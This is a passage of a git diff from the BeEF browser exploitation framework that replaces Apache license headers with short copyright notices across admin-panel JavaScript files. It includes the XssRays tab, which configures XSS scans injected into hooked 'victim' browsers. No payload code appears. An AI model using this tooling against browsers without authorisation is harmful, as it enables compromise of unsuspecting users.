+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 var ZombiesMgr = function(zombies_tree_lists) {
 	
 	//save the list of trees in the object
diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js
index df8129193..8e5f15a71 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/common.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/common.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 var zombie_execute_button_text = 'Execute'
 var zombie_reexecute_button_text = 'Re-execute'
 var re_execute_command_title = 'Re-execute command'
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
index bf9bb7357..1a03cf59a 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * The command tab panel. Listing the list of commands sent to the zombie.
  * Loaded in /ui/panel/index.html 
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
index 9e038cff2..e80c39d42 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * The main Tab panel for the selected zombie.
  */
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
index 509956179..6f8b2f77f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * The Ipec Tab panel for the selected zombie.
  */
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
index e0c8ac7dd..cd57346b2 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * The log Tab panel for the selected zombie.
  */
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
index 6d7eaf5dc..ed30b2e8d 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * The request Tab panel for the selected zombie.
  * Loaded in /ui/panel/index.html
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
index 093377010..c9c549e4f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
@@ -1,172 +1,163 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*
- * The XssRays Tab panel for the selected zombie.
- */
-
-//TODO: fix positioning issues, probably because we are not creating a nested (fucking) panel
-ZombieTab_XssRaysTab = function(zombie) {
-
-	var commands_statusbar = new Beef_StatusBar('xssrays-bbar-zombie-'+zombie.session);
-
-     var req_pagesize = 30;
-
-    var xssrays_config_panel = new Ext.Panel({
-		id: 'xssrays-config-zombie-'+zombie.session,
-		title: 'Scan Config',
-		layout: 'fit'
-	});
-
-     var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({
-        storeId: 'xssrays-logs-store-zombie-' + zombie.session,
-        url: '/ui/xssrays/zombie.json',
-        remoteSort: false,
-        autoDestroy: true,
-        autoLoad: false,
-        root: 'logs',
-
-        fields: ['id', 'vector_method', 'vector_name', 'vector_poc'],
-        sortInfo: {field: 'id', direction: 'DESC'},
-
-        baseParams: {
-            nonce: Ext.get("nonce").dom.value,
-            zombie_session: zombie.session
-        }
-    });
-
-    var xssrays_logs_bbar = new Ext.PagingToolbar({
-        pageSize: req_pagesize,
-        store: xssrays_logs_store,
-        displayInfo: true,
-        displayMsg: 'Displaying history {0} - {1} of {2}',
-        emptyMsg: 'No history to display'
-    });
-
-    var xssrays_logs_grid = new Ext.grid.GridPanel({
-        id: 'xssrays-logs-grid-zombie-' + zombie.session,
-        store: xssrays_logs_store,
-        bbar: xssrays_logs_bbar,
-        border: false,
-        loadMask: {msg:'Loading History...'},
-
-        viewConfig: {
-            forceFit:true
-        },
-
-        view: new Ext.grid.GridView({
-            forceFit: true,
-            emptyText: "No History",
-            enableRowBody:true
-        }),
-
-        columns: [
-            {header: 'Id', width: 10, sortable: true, dataIndex: 'id', hidden:true},
-            {header: 'Vector Method', width: 30, sortable: true, dataIndex: 'vector_method', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
-            {header: 'Vector Name', width: 40, sortable: true, dataIndex: 'vector_name', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
-            {header: 'Vector PoC', sortable: true, dataIndex: 'vector_poc', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
-        ],
-
-        listeners: {
-            afterrender: function(datagrid) {
-                datagrid.store.reload({params:{start:0,limit:req_pagesize, sort: "date", dir:"DESC"}});
-            }
-        }
-    });
-
-    var xssrays_logs_panel = new Ext.Panel({
-		id: 'xssrays-logs-panel-zombie-'+zombie.session,
-		title: 'Logs',
-		items:[xssrays_logs_grid],
-		layout: 'fit',
-
-		listeners: {
-			activate: function(xssrays_logs_panel) {
-				xssrays_logs_panel.items.items[0].store.reload();
-			}
-		}
-	});
-
-    function genScanSettingsPanel(zombie, bar, value) {
-		var form = new Ext.FormPanel({
-			title: 'Scan settings',
-			id: 'xssrays-config-form-zombie'+zombie.session,
-			url: '/ui/xssrays/createNewScan',
-            labelWidth: 230,
-			border: false,
-			padding: '3px 5px 0 5px',
-            defaults: {width: 100},
-            defaultType: 'textfield',
-
-			items:[{
-                fieldLabel: 'Clean Timeout (milliseconds before the injected iFrames are removed from the DOM)',
-                name: 'clean_timeout',
-                allowBlank:false,
-                value: 5000,
-                padding: '10px 5px 0 5px'
-            },{
-               xtype:'checkbox',
-               fieldLabel: 'Cross-domain (check for XSS on cross-domain resources)',
-               name: 'cross_domain',
-               checked: true
-            }],
-
-			buttons: [{
-				text: 'Start Scan',
-				handler: function() {
-					var form = Ext.getCmp('xssrays-config-form-zombie'+zombie.session).getForm();
-
-                    bar.update_sending('Saving settings and ready to start XssRays... ' + zombie.ip + '...');
-
-					form.submit({
-						params: {
-							nonce: Ext.get("nonce").dom.value,
-							zombie_session: zombie.session
-						},
-						success: function() {
-							bar.update_sent("Scan settings saved for hooked browser [" + zombie.ip + "]. XssRays will be added to victim DOM on next polling.");
-						},
-						failure: function() {
-							bar.update_fail("Error! Something went wrong saving scan settings.");
-						}
-					});
-				}
-			}]
-		});
-
-		panel = Ext.getCmp('xssrays-config-zombie-'+zombie.session);
-		panel.setTitle('Scan Config');
-		panel.add(form);
-	}
-
-	ZombieTab_XssRaysTab.superclass.constructor.call(this, {
-        id: 'xssrays-log-tab-'+zombie.session,
-		title: 'XssRays',
-		activeTab: 0,
-		viewConfig: {
-			forceFit: true,
-			type: 'fit'
-		},
-        items: [xssrays_logs_panel, xssrays_config_panel],
-        bbar: commands_statusbar,
-        listeners: {
-			afterrender : function(){
-				genScanSettingsPanel(zombie, commands_statusbar);
-			}
-		}
-	});
-};
-
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*
+ * The XssRays Tab panel for the selected zombie.
+ */
+
+//TODO: fix positioning issues, probably because we are not creating a nested (fucking) panel
+ZombieTab_XssRaysTab = function(zombie) {
+
+	var commands_statusbar = new Beef_StatusBar('xssrays-bbar-zombie-'+zombie.session);
+
+     var req_pagesize = 30;
+
+    var xssrays_config_panel = new Ext.Panel({
+		id: 'xssrays-config-zombie-'+zombie.session,
+		title: 'Scan Config',
+		layout: 'fit'
+	});
+
+     var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({
+        storeId: 'xssrays-logs-store-zombie-' + zombie.session,
+        url: '/ui/xssrays/zombie.json',
+        remoteSort: false,
+        autoDestroy: true,
+        autoLoad: false,
+        root: 'logs',
+
+        fields: ['id', 'vector_method', 'vector_name', 'vector_poc'],
+        sortInfo: {field: 'id', direction: 'DESC'},
+
+        baseParams: {
+            nonce: Ext.get("nonce").dom.value,
+            zombie_session: zombie.session
+        }
+    });
+
+    var xssrays_logs_bbar = new Ext.PagingToolbar({
+        pageSize: req_pagesize,
+        store: xssrays_logs_store,
+        displayInfo: true,
+        displayMsg: 'Displaying history {0} - {1} of {2}',
+        emptyMsg: 'No history to display'
+    });
+
+    var xssrays_logs_grid = new Ext.grid.GridPanel({
+        id: 'xssrays-logs-grid-zombie-' + zombie.session,
+        store: xssrays_logs_store,
+        bbar: xssrays_logs_bbar,
+        border: false,
+        loadMask: {msg:'Loading History...'},
+
+        viewConfig: {
+            forceFit:true
+        },
+
+        view: new Ext.grid.GridView({
+            forceFit: true,
+            emptyText: "No History",
+            enableRowBody:true
+        }),
+
+        columns: [
+            {header: 'Id', width: 10, sortable: true, dataIndex: 'id', hidden:true},
+            {header: 'Vector Method', width: 30, sortable: true, dataIndex: 'vector_method', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+            {header: 'Vector Name', width: 40, sortable: true, dataIndex: 'vector_name', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+            {header: 'Vector PoC', sortable: true, dataIndex: 'vector_poc', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
+        ],
+
+        listeners: {
+            afterrender: function(datagrid) {
+                datagrid.store.reload({params:{start:0,limit:req_pagesize, sort: "date", dir:"DESC"}});
+            }
+        }
+    });
+
+    var xssrays_logs_panel = new Ext.Panel({
+		id: 'xssrays-logs-panel-zombie-'+zombie.session,
+		title: 'Logs',
+		items:[xssrays_logs_grid],
+		layout: 'fit',
+
+		listeners: {
+			activate: function(xssrays_logs_panel) {
+				xssrays_logs_panel.items.items[0].store.reload();
+			}
+		}
+	});
+
+    function genScanSettingsPanel(zombie, bar, value) {
+		var form = new Ext.FormPanel({
+			title: 'Scan settings',
+			id: 'xssrays-config-form-zombie'+zombie.session,
+			url: '/ui/xssrays/createNewScan',
+            labelWidth: 230,
+			border: false,
+			padding: '3px 5px 0 5px',
+            defaults: {width: 100},
+            defaultType: 'textfield',
+
+			items:[{
+                fieldLabel: 'Clean Timeout (milliseconds before the injected iFrames are removed from the DOM)',
+                name: 'clean_timeout',
+                allowBlank:false,
+                value: 5000,
+                padding: '10px 5px 0 5px'
+            },{
+               xtype:'checkbox',
+               fieldLabel: 'Cross-domain (check for XSS on cross-domain resources)',
+               name: 'cross_domain',
+               checked: true
+            }],
+
+			buttons: [{
+				text: 'Start Scan',
+				handler: function() {
+					var form = Ext.getCmp('xssrays-config-form-zombie'+zombie.session).getForm();
+
+                    bar.update_sending('Saving settings and ready to start XssRays... ' + zombie.ip + '...');
+
+					form.submit({
+						params: {
+							nonce: Ext.get("nonce").dom.value,
+							zombie_session: zombie.session
+						},
+						success: function() {
+							bar.update_sent("Scan settings saved for hooked browser [" + zombie.ip + "]. XssRays will be added to victim DOM on next polling.");
+						},
+						failure: function() {
+							bar.update_fail("Error! Something went wrong saving scan settings.");
+						}
+					});
+				}
+			}]
+		});
+
+		panel = Ext.getCmp('xssrays-config-zombie-'+zombie.session);
+		panel.setTitle('Scan Config');
+		panel.add(form);
+	}
+
+	ZombieTab_XssRaysTab.superclass.constructor.call(this, {
+        id: 'xssrays-log-tab-'+zombie.session,
+		title: 'XssRays',
+		activeTab: 0,
+		viewConfig: {
+			forceFit: true,
+			type: 'fit'
+		},
+        items: [xssrays_logs_panel, xssrays_config_panel],
+        bbar: commands_statusbar,
+        listeners: {
+			afterrender : function(){
+				genScanSettingsPanel(zombie, commands_statusbar);
+			}
+		}
+	});
+};
+
 Ext.extend(ZombieTab_XssRaysTab, Ext.TabPanel, {} );
\ No newline at end of file
diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
index aa04f300f..1af9cf2c9 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * The zombie panel located on the left hand side of the interface.
  */
diff --git a/extensions/admin_ui/media/javascript/ux/PagingStore.js b/extensions/admin_ui/media/javascript/ux/PagingStore.js
index d8c66b236..0536b4131 100644
--- a/extensions/admin_ui/media/javascript/ux/PagingStore.js
+++ b/extensions/admin_ui/media/javascript/ux/PagingStore.js
@@ -1,568 +1,559 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*
- * PagingStore for Ext 3.2 - v0.5
- */
-Ext.ns('Ext.ux.data');
-Ext.ux.data.PagingStore = Ext.extend(Ext.data.Store, {
-    add: function (records) {
-        records = [].concat(records);
-        if (records.length < 1) {
-            return;
-        }
-        for (var i = 0, len = records.length; i < len; i++) {
-            records[i].join(this);
-        }
-        var index = this.data.length;
-        this.data.addAll(records);
-        // *** add ***
-        if (this.allData) {
-            this.allData.addAll(records);
-        }
-        // *** end ***
-        if (this.snapshot) {
-            this.snapshot.addAll(records);
-        }
-        // *** add ***
-        this.totalLength += records.length;
-        // *** end ***
-        this.fireEvent('add', this, records, index);
-    },
-    remove: function (record) {
-        if (Ext.isArray(record)) {
-            Ext.each(record, function (r) {
-                this.remove(r);
-            }, this);
-            return;
-        }
-        // *** add ***
-        if (this != record.store) {
-            return;
-        }
-        record.join(null);
-        // *** end ***
-        var index = this.data.indexOf(record);
-        if (index > -1) {
-            // record.join(null);
-            this.data.removeAt(index);
-        }
-        if (this.pruneModifiedRecords) {
-            this.modified.remove(record);
-        }
-        // *** add ***
-        if (this.allData) {
-            this.allData.remove(record);
-        }
-        // *** end ***
-        if (this.snapshot) {
-            this.snapshot.remove(record);
-        }
-        // *** add ***
-        this.totalLength--;
-        // *** end ***
-        if (index > -1) {
-            this.fireEvent('remove', this, record, index);
-        }
-    },
-    removeAll: function (silent) {
-        // *** add ***
-        var items = [].concat((this.snapshot || this.allData || this.data).items);
-        // *** end ***
-        // var items = [];
-        // this.each(function (rec) {
-        //     items.push(rec);
-        // });
-        this.clearData();
-        // if (this.snapshot) {
-        //     this.snapshot.clear();
-        // }
-        if (this.pruneModifiedRecords) {
-            this.modified = [];
-        }
-        // *** add ***
-        this.totalLength = 0;
-        // *** end ***
-        if (silent !== true) {
-            this.fireEvent('clear', this, items);
-        }
-    },
-    insert: function (index, records) {
-        records = [].concat(records);
-        for (var i = 0, len = records.length; i < len; i++) {
-            this.data.insert(index, records[i]);
-            records[i].join(this);
-        }
-        // *** add ***
-        if (this.allData) {
-            this.allData.addAll(records);
-        }
-        // *** end ***
-        if (this.snapshot) {
-            this.snapshot.addAll(records);
-        }
-        // *** add ***
-        this.totalLength += records.length;
-        // *** end ***
-        this.fireEvent('add', this, records, index);
-    },
-    getById: function (id) {
-        // *** add ***
-        return (this.snapshot || this.allData || this.data).key(id);
-        // *** end ***
-        // return this.data.key(id);
-    },
-    clearData: function () {
-        // *** add ***
-        if (this.allData) {
-            this.data = this.allData;
-            delete this.allData;
-        }
-        if (this.snapshot) {
-            this.data = this.snapshot;
-            delete this.snapshot;
-        }
-        // *** end ***
-        this.data.each(function (rec) {
-            rec.join(null);
-        });
-        this.data.clear();
-    },
-    execute: function (action, rs, options, batch) {
-        if (!Ext.data.Api.isAction(action)) {
-            throw new Ext.data.Api.Error('execute', action);
-        }
-        options = Ext.applyIf(options || {}, {
-            params: {}
-        });
-        if (batch !== undefined) {
-            this.addToBatch(batch);
-        }
-        var doRequest = true;
-        if (action === 'read') {
-            doRequest = this.fireEvent('beforeload', this, options);
-            Ext.applyIf(options.params, this.baseParams);
-        }
-        else {
-            if (this.writer.listful === true && this.restful !== true) {
-                rs = (Ext.isArray(rs)) ? rs : [rs];
-            }
-            else if (Ext.isArray(rs) && rs.length == 1) {
-                rs = rs.shift();
-            }
-            if ((doRequest = this.fireEvent('beforewrite', this, action, rs, options)) !== false) {
-                this.writer.apply(options.params, this.baseParams, action, rs);
-            }
-        }
-        if (doRequest !== false) {
-            if (this.writer && this.proxy.url && !this.proxy.restful && !Ext.data.Api.hasUniqueUrl(this.proxy, action)) {
-                options.params.xaction = action;
-            }
-            // *** add ***
-            if (action === "read" && this.isPaging(Ext.apply({}, options.params))) {
-                (function () {
-                    if (this.allData) {
-                        this.data = this.allData;
-                        delete this.allData;
-                    }
-                    this.applyPaging();
-                    this.fireEvent("datachanged", this);
-                    var r = [].concat(this.data.items);
-                    this.fireEvent("load", this, r, options);
-                    if (options.callback) {
-                        options.callback.call(options.scope || this, r, options, true);
-                    }
-                }).defer(1, this);
-                return true;
-            }
-            // *** end ***
-            this.proxy.request(Ext.data.Api.actions[action], rs, options.params, this.reader, this.createCallback(action, rs, batch), this, options);
-        }
-        return doRequest;
-    },
-    loadRecords: function (o, options, success) {
-        if (this.isDestroyed === true) {
-            return;
-        }
-        if (!o || success === false) {
-            if (success !== false) {
-                this.fireEvent('load', this, [], options);
-            }
-            if (options.callback) {
-                options.callback.call(options.scope || this, [], options, false, o);
-            }
-            return;
-        }
-        var r = o.records,
-            t = o.totalRecords || r.length;
-        if (!options || options.add !== true) {
-            if (this.pruneModifiedRecords) {
-                this.modified = [];
-            }
-            for (var i = 0, len = r.length; i < len; i++) {
-                r[i].join(this);
-            }
-            //if (this.snapshot) {
-            //    this.data = this.snapshot;
-            //    delete this.snapshot;
-            //}
-            this.clearData();
-            this.data.addAll(r);
-            this.totalLength = t;
-            this.applySort();
-            // *** add ***
-            if (!this.allData) {
-                this.applyPaging();
-            }
-            if (r.length > this.getCount()) {
-                r = [].concat(this.data.items);
-            }
-            // *** end ***
-            this.fireEvent('datachanged', this);
-        } else {
-            this.totalLength = Math.max(t, this.data.length + r.length);
-            this.add(r);
-        }
-        this.fireEvent('load', this, r, options);
-        if (options.callback) {
-            options.callback.call(options.scope || this, r, options, true);
-        }
-    },
-    loadData: function (o, append) {
-        // *** add ***
-        this.isPaging(Ext.apply({}, this.lastOptions ? this.lastOptions.params : null, this.baseParams));
-        // *** end ***
-        var r = this.reader.readRecords(o);
-        this.loadRecords(r, {
-            add: append
-        }, true);
-    },
-    getTotalCount: function () {
-        // *** add ***
-        if (this.allData) {
-            return this.allData.getCount();
-        }
-        // *** end ***
-        return this.totalLength || 0;
-    },
-    sortData: function () {
-        var sortInfo = this.hasMultiSort ? this.multiSortInfo : this.sortInfo,
-            direction = sortInfo.direction || "ASC",
-            sorters = sortInfo.sorters,
-            sortFns = [];
-        if (!this.hasMultiSort) {
-            sorters = [{
-                direction: direction,
-                field: sortInfo.field
-            }];
-        }
-        for (var i = 0, j = sorters.length; i < j; i++) {
-            sortFns.push(this.createSortFunction(sorters[i].field, sorters[i].direction));
-        }
-        if (!sortFns.length) {
-            return;
-        }
-        var directionModifier = direction.toUpperCase() == "DESC" ? -1 : 1;
-        var fn = function (r1, r2) {
-            var result = sortFns[0].call(this, r1, r2);
-            if (sortFns.length > 1) {
-                for (var i = 1, j = sortFns.length; i < j; i++) {
-                    result = result || sortFns[i].call(this, r1, r2);
-                }
-            }
-            return directionModifier * result;
-        };
-        // *** add ***
-        if (this.allData) {
-            this.data = this.allData;
-            delete this.allData;
-        }
-        // *** end ***
-        this.data.sort(direction, fn);
-        if (this.snapshot && this.snapshot != this.data) {
-            this.snapshot.sort(direction, fn);
-        }
-        // *** add ***
-        this.applyPaging();
-        // *** end ***
-    },
-    filterBy: function (fn, scope) {
-        // *** add ***
-        this.snapshot = this.snapshot || this.allData || this.data;
-        // *** end ***
-        // this.snapshot = this.snapshot || this.data;
-        this.data = this.queryBy(fn, scope || this);
-        // *** add ***
-        this.applyPaging();
-        // *** end ***
-        this.fireEvent('datachanged', this);
-    },
-    clearFilter: function (suppressEvent) {
-        if (this.isFiltered()) {
-            this.data = this.snapshot;
-            delete this.snapshot;
-            // *** add ***
-            delete this.allData;
-            this.applyPaging();
-            // *** end ***
-            if (suppressEvent !== true) {
-                this.fireEvent('datachanged', this);
-            }
-        }
-    },
-    isFiltered: function () {
-        // *** add ***
-        return !!this.snapshot && this.snapshot != (this.allData || this.data);
-        // *** end ***
-        // return !!this.snapshot && this.snapshot != this.data;
-    },
-    queryBy: function (fn, scope) {
-        // *** add ***
-        var data = this.snapshot || this.allData || this.data;
-        // *** end ***
-        // var data = this.snapshot || this.data;
-        return data.filterBy(fn, scope || this);
-    },
-    collect: function (dataIndex, allowNull, bypassFilter) {
-        // *** add ***
-        var d = (bypassFilter === true ? this.snapshot || this.allData || this.data : this.data).items;
-        // *** end ***
-        // var d = (bypassFilter === true && this.snapshot) ? this.snapshot.items : this.data.items;
-        var v, sv, r = [],
-            l = {};
-        for (var i = 0, len = d.length; i < len; i++) {
-            v = d[i].data[dataIndex];
-            sv = String(v);
-            if ((allowNull || !Ext.isEmpty(v)) && !l[sv]) {
-                l[sv] = true;
-                r[r.length] = v;
-            }
-        }
-        return r;
-    },
-    findInsertIndex : function(record){
-        this.suspendEvents();
-        var data = this.data.clone();
-        this.data.add(record);
-        this.applySort();
-        var index = this.data.indexOf(record);
-        this.data = data;
-        // *** add ***
-        this.totalLength--;
-        // *** end ***
-        this.resumeEvents();
-        return index;
-    },
-    // *** add ***
-    isPaging: function (params) {
-        var pn = this.paramNames,
-            start = params[pn.start],
-            limit = params[pn.limit];
-        if ((typeof start != 'number') || (typeof limit != 'number')) {
-            delete this.start;
-            delete this.limit;
-            this.lastParams = params;
-            return false;
-        }
-        this.start = start;
-        this.limit = limit;
-        delete params[pn.start];
-        delete params[pn.limit];
-        var lastParams = this.lastParams;
-        this.lastParams = params;
-        if (!this.proxy) {
-            return true;
-        }
-        if (!lastParams) {
-            return false;
-        }
-        for (var param in params) {
-            if (params.hasOwnProperty(param) && (params[param] !== lastParams[param])) {
-                return false;
-            }
-        }
-        for (param in lastParams) {
-            if (lastParams.hasOwnProperty(param) && (params[param] !== lastParams[param])) {
-                return false;
-            }
-        }
-        return true;
-    },
-    applyPaging: function () {
-        var start = this.start,
-            limit = this.limit;
-        if ((typeof start == 'number') && (typeof limit == 'number')) {
-            var allData = this.data,
-                data = new Ext.util.MixedCollection(allData.allowFunctions, allData.getKey);
-            data.items = allData.items.slice(start, start + limit);
-            data.keys = allData.keys.slice(start, start + limit);
-            var len = data.length = data.items.length;
-            var map = {};
-            for (var i = 0; i < len; i++) {
-                var item = data.items[i];
-                map[data.getKey(item)] = item;
-            }
-            data.map = map;
-            this.allData = allData;
-            this.data = data;
-        }
-    }
-    // *** end ***
-});
-
-Ext.ux.data.PagingDirectStore = Ext.extend(Ext.ux.data.PagingStore, {
-    constructor: Ext.data.DirectStore.prototype.constructor
-});
-Ext.reg('pagingdirectstore', Ext.ux.data.PagingDirectStore);
-
-Ext.ux.data.PagingJsonStore = Ext.extend(Ext.ux.data.PagingStore, {
-    constructor: Ext.data.JsonStore.prototype.constructor
-});
-Ext.reg('pagingjsonstore', Ext.ux.data.PagingJsonStore);
-
-Ext.ux.data.PagingXmlStore = Ext.extend(Ext.ux.data.PagingStore, {
-    constructor: Ext.data.XmlStore.prototype.constructor
-});
-Ext.reg('pagingxmlstore', Ext.ux.data.PagingXmlStore);
-
-Ext.ux.data.PagingArrayStore = Ext.extend(Ext.ux.data.PagingStore, {
-    constructor: Ext.data.ArrayStore.prototype.constructor,
